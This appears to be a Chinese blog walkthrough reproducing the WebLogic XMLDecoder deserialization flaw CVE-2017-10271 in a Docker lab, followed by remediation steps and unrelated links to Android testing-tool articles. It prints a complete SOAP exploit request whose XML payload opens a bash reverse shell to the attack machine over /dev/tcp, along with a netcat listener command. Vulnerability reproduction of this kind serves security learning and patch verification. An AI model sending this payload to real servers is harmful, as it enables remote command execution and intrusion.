Weblogic XMLDecoder反序列化漏洞复现(CVE-2017-10271)

最新推荐文章于 2025-02-21 14:39:32 发布
最新推荐文章于 2025-02-21 14:39:32 发布
阅读量1.1k 收藏 5
点赞数
分类专栏: 漏洞复现 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/q943111495/article/details/121032361
版权
本文详细介绍了Weblogic XMLDecoder反序列化漏洞CVE-2017-10271,包括漏洞简介、影响版本、产生原因、复现过程以及修复方案。该漏洞允许攻击者通过构造特定的SOAP请求,利用XMLDecoder组件执行任意命令。修复措施包括安装Oracle提供的补丁、配置防火墙规则以及删除受影响的war包。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

#Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)#

一、漏洞简介

weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

二、漏洞影响

影响版本

10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0

三、产生原因

CVE-2017-10271漏洞主要是由WebLogic Server WLS组件远程命令执行漏洞,主要由wls-wsat.war触发该漏洞,触发漏洞url如下: http://192.168.xx.xx:7001/wls-wsat/CoordinatorPortType post数据包,通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞。

四、复现过程

docker 靶机:192.168.111.137

kali攻击机 :192.168.111.142

docker搭建靶场环境

docker-compose build
docker-compose up -d

访问

http://192.168.111.137:7001

出现该界面则环境搭建成功。

在这里插入图片描述

访问

http://192.168.111.137:7001/wls-wsat/CoordinatorPortType

出现如下界面说明存在该漏洞。

在这里插入图片描述

在攻击机上开启端口监听

nc -l -p 21

burp构造发送的post数据包,注意payload部分需要html编码。

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.111.137:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.111.142/21 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

在这里插入图片描述

成功反弹shell

在这里插入图片描述

五、修复方案

1、更新Oracle相应补丁

2、对wls-wsat的资源访问在防火墙或路由器和交换机上做acl访问控制规则

3、在不影响业务的前提下删除相应war包

rm -f/home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war
rm -f/home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
rm -rf/home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat

重启weblogic后观察wls-wsat/目录下那8个URI是否还可访问,如为404即删除成功。

六、参考链接

weblogic漏洞分析之CVE-2017-10271

Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)

标签

CVE-2017-10271、Weblogic、XMLDecoder反序列化

app稳定性测试之Monkey工具
05-22 1820
Monkey是一款针对Android应用程序的自动化测试工具,它的名字寓意着像猴子一样在软件上随机乱敲按键,以此来模拟用户的随机操作。通过向系统发送伪随机的用户事件流(如按键输入、触摸屏输入、滑动Trackball、手势输入等操作),Monkey可以对设备上的程序进行测试,检测程序在长时间运行下的稳定性,并观察程序在何种情况下会出现异常。
稳定性测试Fastbot-Andriod
m0_71999197的博客
03-08 568
Fastbot基于model-based testing 结合机器学习、强化学习的APP 稳定性测试工具
Fastbot_Android 介绍
最新发布
jxhln的博客
02-21 126
ADBKeyBoard在输入栏自动输入内容,屏蔽UI输入法遇到搜索栏乱输入,想要输入指定字符下载 ADBKeyBoard,并在手机端中设置为默认输入法 ADBKeyBoard下载地址,生效后,当遇到输入栏ADBKeyBoard不会弹起ui输入栏,会显示配置max.config中在pc端新建max.config文件(文件名称不可更改)输入通过以下命令将max.config文件push到手机端从文件中随机读取字符串输入配置max.config中在pc端新建文件(文件名称不可更改)
测试工具Fastbot 客户端稳定性测试
gogoboi_jin的博客
11-04 1532
做这个主要为了发版之前提前发现崩溃,风险前置。适合客户端很重的业务。优点:你不改动也能用, 维护成本不高。缺点:容易进入H5页面无法返回,效果有限。备注:我这边接手别人维护,公司降本把测开工作给到我这边了。test目录放了相关的各个包定向配置文件(具体查看 push定向配置部分)。需要针对不同的进行定制,对应包的配置值在运行服务器上存放,没有添加git代码中相关的jar需要人工手动的push到 手机的/sdcard 目录中, test目录下的相关配置文件java程序每次安装新包的时候,会重新push到手机/
android 稳定性测试工具,APP 稳定性测试工具-Fastbot_Android详解
weixin_39897887的博客
05-25 575
基于monkey的二次开发,约束monkey的行为,比monkey更智能。写在开始monkey测试的随机性概率过大,导致其效率并不能达到预期。有时可能遍历了很久,依旧与最有可能发生问题的部分擦肩而过。Fastbot_Android介绍基于model-based testing 结合机器学习、强化学习的APP 稳定性测试⼯具优势1.模拟机和真机均可以2.继承原⽣Monkey的优势,快速点击,每秒...
Fastbot稳定性测试
weixin_44775434的博客
05-05 2253
Fastbot 稳定性测试的特点主要在于:使用简单,可快速上手操作,其探索过程中其对探索应用的深度和范围都比现有的 monkey 要更好,同时也可以满足对特定的业务进行定向测试的需求。
3分钟了解Android稳定性测试
qq_53071851的博客
05-24 467
一、什么是Monkey,Monkey在英文里的含义是猴子,在测试行业的学名叫“猴子测试”,指的是没有测试经验的人甚至是根本不懂计算机的人(就像一只猴子),不需要知道程序的任何用户交互方面的知识,给他一个程序,他就会对他看到的任何界面进行操作,当然操作是无目的的、随便乱按乱点的,这种测试在产品周期的早期阶段会很有效,为用户节省了很多时间。Monkey 是 Android平台提供的一种自动化测试方法,它会随机的模拟发送各种按键,点击,滑动等用户事件来实现压力测试。看系统版本是否稳定,能否持续的为用户提供服务
APP稳定性测试工具fastbot(字节开源项目)
热门推荐
hdandan2015的博客
09-16 1万+
1、简介 fastbot是字节团队基于monkey的二次开发的app稳定性测试工具,目前已经开源,此工具有比较深入的算法探索,目前已经更新了多个版本,相对稳定的支持了移动端app、H5页面的自动化遍历,支持定制测试、当发生crash、anr时会有比较全的log可导出供分析。 简介参考testhome:字节跳动质量利器 -- 移动端智能化稳定性测试工具 Fastbot-Android/iOS 双端重磅发布上线 · TesterHome 更多详情参见:奔跑吧!智能Monkey之Fastbot跨平台 此开
python:快速启动-android稳定性测试
一名小测试
02-23 2120
快速启动-android稳定性测试 前置条件: 需安装adb环境、需安装adb环境、需安装adb环境,重要事情说三遍 项目简介: 结合字节跳动提供的开源工具Fastbot_android, 进行封装了基础版的稳定性测试,只需要数据线连接电脑,并确定在cmd中输入adb devices,看到了手机设备号,即可运行命令。 修改日志 第二版主要是优化读取命令的方式、简化了命令行输入命令、增加自定义元素点击及工程目录的创建 安装包 pipinstallfastrun 网站简介 https://py..
python:app稳定性测试工具
一名小测试
02-17 6823
工作中因要测试app稳定性,市场上多用于monkey进行稳定测试,而字节跳动开源了一个基于monkey的稳定性测试工具Fastbot,使用了一阶段,超级棒. 因为每次都要去输入一堆命令,故写了一个第三方包,主要功能是基于持续几分钟的点击效果 首先是构建包 创建一个包的工程目录: #\launchProject\setup.py fromsetuptoolsimportsetup,find_packages withopen("README.md","r",encodin...
APP智能遍历工具-Fastbot
qq_42264956的博客
09-18 2463
APP智能遍历工具-Fastbot
Fastbot_Android:Fastbot(2.0)是基于模型的测试工具,用于对GUI过渡进行建模以发现应用程序稳定性问题
04-13
Fastbot-Android开源手册 介绍 Fastbot是基于模型的测试工具,用于对GUI过渡进行建模以发现应用程序稳定性问题。 它结合了机器学习和强化学习技术,以更智能的方式帮助发现。 Fastbot中的GUI状态抽象是通过参考项目APE实现的。 特征 Fastbot与多种Android OS系统兼容,包括原始AndroidAndroid 5-11以及国内制造商对基于Andriod的修改后的系统的变体。 从原始的Monkey继承而来,Fastbot允许每秒插入多达12个动作的快速动作。 专家系统具备根据不同业务线的需求进行深度定制的能力。 Fastbot是基于模型的测试工具。 模型是通过考虑高奖励选择选择的图过渡来构建的。 Fastbot通过计算机视觉技术(例如YOLOv3,ocr和cv分段)支持非标准小部件。 Fastbot-iOS:正在建设中 用法 环境准备 确保您的
Android稳定性测试APK
08-15
Android稳定性测试APK,可以进行稳定性测试和平板耗电测试。
Android APP 稳定性测试工具—Fastboot使用教程
u014802464的博客
08-23 5403
测试工具Android APP 稳定性测试工具
APP稳定性测试工具:Monkey
qq_43371695的博客
09-19 269
Monkey 是一款 app 的自动化测试工具,monkey 是猴子的意思,所以从原理上说,它的自动化测试就类似猴子一样在软件上乱敲按键,猴子什么都不懂,就爱捣乱。Monkey 原理也是类似,通过向系统发送伪随机的用户事件流(如按键输入、触摸屏输入、滑动 Trackball、手势输入等操作),来对设备上的程序进行测试,检测程序长时间的稳定性,多久的时间会发生异常。
安卓稳定性测试必备工具Monkey详解
软件测试技术交流分享
08-11 722
Monkey主要就是为了测试APP,是否会出现崩溃
Android稳定性测试利器-Monkey介绍及环境配置
nicolas_li的专栏
07-27 4624
 一、什么是Monkey Monkey是Android中的一个命令行工具,可以运行在Android模拟器或手机设备中。它向系统发送伪随机的用户事件流(如屏幕的点击、滑动和系统按键操作等),实现对正在开发的app进行压力测试。Monkey主要用于对android系统中开发的app进行稳定性测试。 Monkey在使用时需要通过USB将手机设备与PC相连,在PC端使用Adb shell命令调用
App稳定性测试-Fastbot使用笔记
qq_38032510的博客
11-18 1万+
app稳定性测试工具使用方法
Android APP稳定性测试工具Fastbot
测试开发小记
11-14 4477
Fastbot是由字节跳动 Quality Lab开源的一款基于model-based testing 结合机器学习、强化学习的APP 稳定性测试工具,提供了Android和iOS版本。本文记录一下Fastbot的使用方法。
fastbot 字节
09-18
fastbot 是字节跳动旗下的一个智能助手,在2021年推出。它具有多项功能,可以为用户提供语音交互、信息搜索、日程管理、天气查询等等服务。 首先,fastbot 的语音交互功能非常强大。它可以听懂用户的语音指令,并通过智能算法进行解析和理解。用户可以通过语音的方式与fastbot 进行对话,非常方便。 其次,fastbot 可以进行信息搜索。用户可以向fastbot 提出问题或者搜索请求,fastbot 会通过搜索引擎或者自有数据库快速找到答案并反馈给用户。这对于用户获取信息非常便捷。 此外,fastbot 还具备日程管理功能。用户可以在fastbot 中设置提醒事项、安排日程,fastbot 会在事项发生之前提醒用户,帮助用户合理安排时间。 最后,fastbot 还可以查询天气。用户可以询问fastbot当天或者未来几天的天气情况,fastbot 会通过调用天气接口提供详细的天气预报,帮助用户合理出行。 总而言之,fastbot 字节是一个功能强大的智能助手,它通过语音交互、信息搜索、日程管理和天气查询等多项功能,可以提供便捷的服务,帮助用户更高效地处理各种事务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值